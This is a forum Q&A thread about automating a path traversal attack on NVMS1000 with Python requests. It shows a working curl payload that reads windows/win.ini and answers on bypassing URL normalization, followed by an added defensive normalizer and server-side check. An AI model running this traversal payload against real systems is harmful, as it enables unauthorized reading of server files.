Reputation: 21
Recently I wanted to automate an attack for a web app that is prone to path traversal attacks (NVMS1000) via the Python requests module.
The request works perfectly with curl by using the option path-as-is:
curl --path-as-is http://127.0.0.1/../../../../../../../../../../windows/win.ini
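However, when using the Python requests module the "../" were stripped from the URL path (as I can clearly see e.g. via Burp Suite):
import requests

# Burp Suite proxy listener (assumed default address; not shown in the original post)
proxies = {"http": "http://127.0.0.1:8080"}
host = "127.0.0.1"
path = "/../../../../../../../../../.."
file = "/windows/win.ini"
# requests needs an explicit scheme in the URL
url = "http://" + host + path + file
response = requests.get(url, proxies=proxies)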
I checked the docs but did not find any explanation for this behaviour, nor did I find an option to prevent the stripping/normalization similar to the option for curl.
Platform is Debian, requests module is version 2.22.0.
Thanks for your help.
Upvotes: 2
Views: 3468
Reputation: 61
I know I am late, but consider downgrading urllib3:
pip install --upgrade urllib3==1.24.3
Or better yet, you should use prepared requests:
import requests

my_url = 'http://127.0.0.1/../../../../../../../../../../windows/win.ini'
s = requests.Session()
r = requests.Request(method='GET', url=my_url)
prep = r.prepare()
# overwrite the URL on the prepared request before it is sent
prep.url = my_url # actual url you want
response = s.send(prep)
Upvotes: 1
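Added example, not part of the original question or answer: the dot-segment removal described in RFC 3986 section 5.2.4, which produces the same stripped path the question reports, next to a server-side check on the path as received. The function names are assumptions made for illustration; the point for a defender is that a client can skip this normalization, so the server has to validate the raw path itself.

```python
from urllib.parse import unquote

# Path taken from the question; everything else here is illustrative.
RAW_PATH = "/../../../../../../../../../../windows/win.ini"


def remove_dot_segments(path: str) -> str:
    """Normalize a URL path as RFC 3986 section 5.2.4 describes."""
    out = []
    while path:
        if path.startswith("../"):
            path = path[3:]
        elif path.startswith("./") or path.startswith("/./"):
            path = path[2:]
        elif path == "/.":
            path = "/"
        elif path.startswith("/../") or path == "/..":
            # drop the ".." and the segment that precedes it, if any
            path = "/" + path[4:]
            if out:
                out.pop()
        elif path in (".", ".."):
            path = ""
        else:
            # move the first segment (with its leading "/") to the output
            cut = path.find("/", 1)
            cut = len(path) if cut == -1 else cut
            out.append(path[:cut])
            path = path[cut:]
    return "".join(out)


def has_parent_segment(raw_path: str) -> bool:
    """Server-side check on the request path exactly as it arrived."""
    # decode percent-escapes and treat "\" like "/" (Windows targets)
    decoded = unquote(raw_path).replace("\\", "/")
    return ".." in decoded.split("/")


if __name__ == "__main__":
    normalized = remove_dot_segments(RAW_PATH)
    print("normalizing client sends:", normalized)
    print("raw path flagged by server check:", has_parent_segment(RAW_PATH))
    print("normalized path flagged:", has_parent_segment(normalized))
```

A server that only ever sees traffic from normalizing clients never exercises this check, which is why the raw form has to be tested explicitly.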